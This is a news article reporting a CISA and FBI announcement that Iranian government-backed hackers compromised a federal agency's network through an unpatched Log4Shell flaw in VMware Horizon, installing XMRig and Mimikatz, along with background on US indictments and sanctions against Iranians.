The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI announced today that Iranian government-backed hackers have compromised the federal agency’s network using an unaddressed Log4Shell vulnerability to compromise users’ credentials. CISA also observed that the Iranian government-backed hackers installed an open-source crypto mining software – XMRig – that is commonly used by hackers for mining virtual currency on compromised computers.
Iranian Government-backed Hackers Utilized Log4Shell vulnerability to Initiate the Attack
According to CISA, the Iranian government-backed hackers used the Log4Shell vulnerability in an unpatched VMware Horizon server, which was first identified In April. CISA said it first observed the suspected activity while conducting a retrospective analysis using a government-run intrusion detection system. Meanwhile, CISA and FBI have encouraged all organizations with affected VMware systems to initiate threat-hunting activities.
Along with XMRig crypto mining software, the threat actors also installed the open-source app Mimikatz to harvest credentials and create a rogue domain administrator account. Dan Lorenc, the CEO, and co-founder of Chainguard, a supply chain cybersecurity company, said; “Log4shell is endemic and it’s going to be around forever, it will remain in every attacker’s toolbox and continue to be used to gain access or for lateral movement for the foreseeable future.”
US Sanctions More Iranians Over Cybercrimes
This is not the first time Iranian hackers have been charged with cybercrime activity, in September 2022, the U.S. Justice Department uncovered a criminal indictment accusing three Iranian nationals of hacking the networks of hundreds of victims in the United States. The US government has been forcing sanctions on Iran, recently, the Biden-led government and its administration have imposed penalties on several Iranian companies, accusing them of being involved in the production of drones to assist Russia in the war.
Also read: Twitter Patches Security Vulnerability that Exposed Nearly 5.4 Million Accounts